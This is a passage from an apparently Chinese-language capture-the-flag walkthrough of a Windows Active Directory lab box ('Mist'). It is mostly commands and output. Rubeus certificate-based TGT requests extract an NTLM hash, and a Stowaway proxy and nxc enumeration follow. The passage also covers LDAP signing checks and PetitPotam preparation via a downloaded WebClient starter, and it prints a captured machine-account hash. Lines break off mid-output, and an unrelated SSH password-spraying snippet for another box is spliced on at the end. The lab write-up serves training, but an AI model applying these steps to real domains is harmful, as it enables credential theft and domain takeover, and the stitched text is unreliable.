b25maWd1cmF0aW9uLERDPW1pc3QsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlv
bkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBuwYI
KwYBBQUHAQEEga4wgaswgagGCCsGAQUFBzAChoGbbGRhcDovLy9DTj1taXN0LURD
MDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZp
Y2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWlzdCxEQz1odGI/Y0FDZXJ0aWZpY2F0
ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwMwYDVR0R
BCwwKqAoBgorBgEEAYI3FAIDoBoMGEJyYW5kb24uS2V5d2FycEBtaXN0Lmh0YjBP
BgkrBgEEAYI3GQIEQjBAoD4GCisGAQQBgjcZAgGgMAQuUy0xLTUtMjEtMTA0NTgw
OTUwOS0zMDA2NjU4NTg5LTI0MjYwNTU5NDEtMTExMDANBgkqhkiG9w0BAQsFAAOC
AQEAPPrL/9GEagrC0coCphzwDu++2yvCZ85UgqQ/u75uWwuH36rszQJZbpVd64W6
F/NOe5OmGkVlgfDGVQZllFSaR38hz03A71pDK1ENhLJhyZE0nFjMFLB9nNbucaXu
trSecISVRy5VDK75ef46dVrXIrpTcV9UI8vsqHIzkStHfwBmuLArxXBZJhjAsgWA
Eq9VOrDd9Z4P72ZC5ZafyS3b8DNoMnlIP52367e1ZgNV23C1/wFAy58gphB4DxyE
fyxMlZJF7oy5r3JMxPBbHa7l9xJmDUFwwnG4mgtzgaPwU2eecbJV/YLwHFq3ZRdL
J1DimSQ20Io7ytnHdxOTvXImrQ==
-----END CERTIFICATE-----
然后把 Brandon.Keywrap.pfx 上传到靶机上
(node 0) >> upload /root/Desktop/htb/mist/Brandon.Keywrap.pfx ./Brandon.Keywrap.pfx
[*] File transmitting, please wait...
3.36 KiB / 3.36 KiB [-----------------------------------------------------------------------------------------------------------------------------------------------------------------------] 100.00% ? p/s 0s
使用 Rubeus 从证书中获取hash
rubeus.exe asktgt /user:brandon.keywarp /certificate:C:\xampp\htdocs\files\Brandon.Keywrap.pfx /getcredentials /show /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Got domain: mist.htb
[*] Using PKINIT with etype rc4_hmac and subject: CN=Brandon.Keywarp, CN=Users, DC=mist, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'mist.htb\brandon.keywarp'
[*] Using domain controller: 192.168.100.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/mist.htb
ServiceRealm : MIST.HTB
UserName : brandon.keywarp (NT_PRINCIPAL)
UserRealm : MIST.HTB
StartTime : 6/2/2025 9:07:33 AM
EndTime : 6/2/2025 7:07:33 PM
RenewTill : 6/9/2025 9:07:33 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : XEKaAEzCg3G1nn5DFlYfSQ==
ASREP (key) : 87C1BDF961FFA67F1BE2031C2C84FAD9
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : c
成功拿到了 Brandon.Keywrap 用户的ntlm hash DB03D6A77A2205BC1D07082740626CC9
3.4. 代理搭建
因为是在内网,我们一直通过一个shell在windwos上并不好操作,很多kali上的工具不能用,因为访问不到内网
利用 Stowaway 搭建代理
(node 0) >> socks 1123
[*] Trying to listen on 0.0.0.0:1123......
[*] Waiting for agent's response......
[*] Socks start successfully!
3.5. SMB枚举
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# proxychains -q nxc smb 192.168.100.100 -u brandon.keywarp -H 'DB03D6A77A2205BC1D07082740626CC9' --shares
SMB 192.168.100.100 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
SMB 192.168.100.100 445 DC01 [+] mist.htb\brandon.keywarp:DB03D6A77A2205BC1D07082740626CC9
SMB 192.168.100.100 445 DC01 [*] Enumerated shares
SMB 192.168.100.100 445 DC01 Share Permissions Remark
SMB 192.168.100.100 445 DC01 ----- ----------- ------
SMB 192.168.100.100 445 DC01 ADMIN$ Remote Admin
SMB 192.168.100.100 445 DC01 C$ Default share
SMB 192.168.100.100 445 DC01 IPC$ READ Remote IPC
SMB 192.168.100.100 445 DC01 NETLOGON READ Logon server share
SMB 192.168.100.100 445 DC01 SYSVOL READ Logon server share
这里没什么可以利用的,
3.6. 创建假机器
我们需要先查询当前用户还能添加几台机器
#Powershell
Get-AdObject -Identity ((Get-AdDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# proxychains -q nxc ldap 192.168.100.100 -u brandon.keywarp -H 'DB03D6A77A2205BC1D07082740626CC9' -M maq
LDAP 192.168.100.100 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:mist.htb)
LDAP 192.168.100.100 389 DC01 [+] mist.htb\brandon.keywarp:DB03D6A77A2205BC1D07082740626CC9
MAQ 192.168.100.100 389 DC01 [*] Getting the MachineAccountQuota
MAQ 192.168.100.100 389 DC01 MachineAccountQuota: 0 #这里0表示我们不能添加机器了
4. NTLNM Relay
4.1. PetitPotam Attack
要执行ntlm rerlay,首先我们需要先检测一下是否有会话签名
Note
会话签名是针对 NTLM 中继的一种强大但有限的缓解措施,只有 SMB 和 LDAP 可以使用。
- SMB 签名以“最低要求”的方式工作。如果客户端或服务器都不需要签名,则不会对会话进行签名(如出于性能问题)
- LDAP 签名的工作方式是“大多数要求”的方式。如果客户端和服务器都支持签名,那么它们会对会话进行签名
使用NXC来检测一下是否有会话签名与通道绑定
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# proxychains -q nxc ldap 192.168.100.100 -u brandon.keywarp -H 'DB03D6A77A2205BC1D07082740626CC9' -M ldap-checker
LDAP 192.168.100.100 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:mist.htb)
LDAP 192.168.100.100 389 DC01 [+] mist.htb\brandon.keywarp:DB03D6A77A2205BC1D07082740626CC9
LDAP-CHE... 192.168.100.100 389 DC01 LDAP signing NOT enforced #无会话签名
LDAP-CHE... 192.168.100.100 389 DC01 LDAPS channel binding is set to: Never #没有开启
这里没有开启,那我们可以尝试使用 PetitPotam 工具,强制Windows以 MS01$ 身份访问我,从而捕获MS01$ 用户的hash
这里有两个问题,
- PetitPotam 中使用的
webclient服务没有启动 - 此攻击还需要一个DNS名称,用于机器账号的身份验证,这里我们是没有权限在域控上创建一个DNS记录的,但这里可以通过隧道技术来完成
当前用户无法枚举 webclient 服务的状态
PS C:\xampp\htdocs\files> sc.exe query webclient 2>&1 es, reg-query, reg-winl
sc.exe query webclient 2>&1
[SC] EnumQueryServicesStatus:OpenService FAILED 5:
Access is denied.
但是,可以用 C# EtwStartWebClient.cs 启动服务。先保存这个文件并用 mono ( apt install mono-mcs )来编译它
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# wget https://gist.githubusercontent.com/klezVirus/af004842a73779e1d03d47e041115797/raw/29747c92ca04c844223d1ef6c1463d7e34e271ee/EtwStartWebClient.cs
--2025-06-02 13:18:25-- https://gist.githubusercontent.com/klezVirus/af004842a73779e1d03d47e041115797/raw/29747c92ca04c844223d1ef6c1463d7e34e271ee/EtwStartWebClient.cs
Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 198.18.1.247
Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|198.18.1.247|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3691 (3.6K) [text/plain]
Saving to: ‘EtwStartWebClient.cs’
EtwStartWebClient.cs 100%[=================================================>] 3.60K --.-KB/s in 0.005s
2025-06-02 13:18:26 (773 KB/s) - ‘EtwStartWebClient.cs’ saved [3691/3691]
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# mcs EtwStartWebClient.cs /unsafe
┌──(root㉿kali)-[~/Desktop/htb/mist]
└─# file EtwStartWebClient.exe
EtwStartWebClient.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
把 EtwStartWebClient.exe 上传到靶机上并运行
C:\xampp\htdocs\files>.\EtwStartWebClient.exe
.\EtwStartWebClient.exe
[+] WebClient Service started successfully
注意:这个会被定时清理掉,所以我们得赶快捕获hash
MS01$::MIST:059d9f988ca3fd4c:64060FE54EFA6DAFF1EE3E2431FAC287:0101000000000000006D6889C2D3DB01C26B35BCA94B53C80000000002000800450057003100340001001E00570049004E002D004C005800580053004900570044004A0031003100580004003400570049004E002D004C005800580053004900570044004A003100310058002E0045005700310034002E004C004F00430041004C000300140045005700310034002E004C004F00430041004C000500140045005700310034002E004C004F00430041004C0007000800006D6889C2D3DB010600040002000000080030003000000000000000000000000040000080FF843D7F65CBFC5BF8F8944D77625794AA8187903BA4423534F118CDAC1CC40A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00380034000000000000000000
oxdf@hacky$ netexec ssh underpass.htb -u users.txt -p passwords.txt --continue-on-success
SSH 10.10.11.48 22 underpass.htb [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10
SSH 10.10.11.48 22 underpass.htb [-] steve:underwaterfriends
SSH 10.10.11.48 22 underpass.htb [+] svcMosh:underwaterfriends Linux - Shell access!
SSH 10.10.11.48 22 underpass.htb [-] root:underwaterfriends
SSH 10.10.11.48 22 underpass.htb [-] steve:412DD4759978ACFCC81DEAB01B382403
SSH 10.10.11.48 22 underpass.htb [-] root:412DD4759978ACFCC81DEAB01B382403